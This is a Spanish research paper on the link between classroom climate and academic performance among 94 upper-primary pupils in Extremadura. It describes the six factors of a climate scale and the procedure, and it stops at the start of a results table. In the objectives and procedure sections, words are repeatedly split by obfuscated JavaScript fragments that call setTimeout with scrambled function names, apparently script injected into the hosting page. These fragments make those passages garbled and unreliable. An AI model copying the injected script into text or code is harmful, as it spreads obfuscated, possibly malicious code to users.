EL CLIMA DEL AULA COMO FACTOR INFLUYENTE EN EL RENDIMIENTO ACADÉMICO

Autor: Francisco José Gata Bejarano

Muchas investigaciones han estudiado los factores que pueden verse implicados en el proceso de enseñanza-aprendizaje. Entre estos factores se encuentra uno que engloba muchos agentes y muchos otros factores implicados en el rendimiento escolar de los dicentes, hablamos del clima en el aula.

Este estudio trata de analizar si existe una correlación significativa directa entre diferentes factores que configuran el clima en el aula mediante la Escala del clima de convivencia y el rendimiento académico, a través de variables de notas medias en el segundo trimestre, nota de los sujetos en matemáticas, lengua y conocimiento del medio.

 

1.     Objetivos generales e hipótesis de investigación

 

 Muchos investigadores han estudiado como el clima del aula es una de las variables que intervienen en el aprendizaje, potenciandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando el gusto por el mismo con un clima del aula positivo, siendo, en cambio, una barrera cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se configura un clima del aula cerrado, autoritario, negativo.

El objetivo que nos plantemos en el presente estudio es saber si en los centros públicos de Extremadura existe correlación entre el clima del aula y el rendimiento académico de los alumnos. Para ello partimos de la siguiente hipótesis de trabajo:


-Existe una correlación  significativa directa entre los factores de la escala del clima del aula y el rendimiento académico medio de             la clase.

Metodología.

2.     Participantes

Hemos trabajado con los alumnos del tercer ciclo de un colegio de titularidad pública del sur de la capital pacense. Con un total de 106 alumnos en el ciclo, hemos recogido la cantidad de 94 muestras. En relación al género, hemos encuestado a un total de 54 chicos y 40 chicas.

3.     Instrumentos

            El instrumento que hemos utilizado ha sido la Escala de clima de convivencia en el aula elaborada por Mª Isabel Polo del Río, Benito León del Barco y Margarita Gozalo Delgado (2013).


            La Escala de clima de convivencia en el aula consta de 43 ítems y se presenta en formato Likert con cinco intervalos en forma numérica del 1 al 5, que representan un continuo que va desde “Nada” hasta “Mucho”. Fue elaborada para medir el clima de convivencia entre compañeros y con el profesor en el aula.


Tal y como describen M.I. Polo, B. León y M. Gozalo (2013), el primer factor, correspondiente a la “actitud del docente”, se refiere a actitudes del docente hacia el alumnado dentro del aula, como escuchar, ayudar, valorar e interesarse por el alumnado, animarle a la participación, así como tener en cuenta sus sugerencias y propuestas, actuar correctamente ante los problemas, animarles a participar facilitar el trabajo en grupo, y esforzarse por utilizar recursos variados para impartir las clases.


          El segundo factor es la implicación del alumnado referido a actitudes del tipo: dar importancia al estudio, al esfuerzo y a la realización de las tareas escolares para la obtención de un buen resultado académico, conocer y entender las normas, así como valorar al maestro como alguien preocupado por el alumnado.


          El tercer factor, “relaciones positivas en el aula”, hace referencia a actitudes grupales como estar a gusto, trabajar en grupo, llevarse bien con los demás compañeros, generar  clima de respeto y ayuda mutua.


            El factor cuarto, “establecimiento y organización de normas”, se refiere a la existencia de normas en el aula, la participación en la creación  de esas normas, revisión de las mismas y el respeto hacia ellas, asi como forma de aumentar el conocimiento entre compañeros.


             El quinto factor, “control y calidad de las normas”, alude a la actitud del alumno que entiende y conoce que el incumplimiento de las normas tiene unas consecuencias, así como que el maestro esté atento al respeto y cumplimiento de las mismas.


             El sexto factor, “organización de las tareas”, hace mención tanto al orden en el desarrollo de la clase, como al orden de las tareas en clase para que resulten interesantes y divertidas para el alumno, a la vez que generen esfuerzos e intereses por ellas.

4.     Procedimiento

Teniendo en cuenta la hipótesis con la que trabajaba, seleccioné la Escala de clima de convivencia en el aula.


Me puse en contacto con el director del colegio público donde iba a pasar los cuestionarios, explicándole en qué consistía mi trabajo y para qué necesitaba la colaboración del centro. No puso ningún impedimento y reunió a los cinco tutores de los grupos del tercer ciclo donde se elaboró la encuesta debido a que ciclos inferiores no iban a entender algunos de los ítems del cuestionario.


Llegado el día para la realización de los cuestionarios fuimos aula por aula explicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que el cuestionario era personal, cada uno debía poner lo que pensara sin dejarse influenciar por los demás y que no había respuestas buenas ni malas, que debían responder cómo ellos pensaban. Les expliqué que era para un trabajo de la Universidad, que disponían de media hora indicandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando que no lo hicieran deprisa y que contestaran con total libertad según sus opiniones. Les facilité el cuestionario y puse un ejemplo con un ítem que no aparecía en el cuestionario para no condicionar la respuesta, con el fin de aclarar cómo lo debían rellenar.


Para efectuar de manera correcta el análisis de los datos, expliqué que debían poner sus nombres y apellidos en el inicio de la escala pero que se mantendría el anonimato de la autoría, que solo serviría para hacer coincidir las notas medias con el número de la escala que cada alumno tenía.

5.     Resultados

5.1.           Correlación de Pearson de los factores con la variable de la media del segundo trimestre

            En la tabla 1 presentamos los resultados de la prueba de correlación de Pearson entre los factores de las notas medias obtenidas por los sujetos en la segunda evaluación y los seis factores que evalúan la actitud docente, la implicación del alumnado, las relaciones en el aula, el establecimiento y organización de normas, el control y calidad de las normas y la organización de las tareas.


 

  Factor 1: Actitud Docente Factor 2: Implicación del alumnado Factor 3: Relaciones Positivas en el aula Factor 4: Establecimiento y organización de normas Factor 5: Control y calidad de las normas Factor 6: Organización de las tareas
  Nota Media 2º Trimestre Pearson

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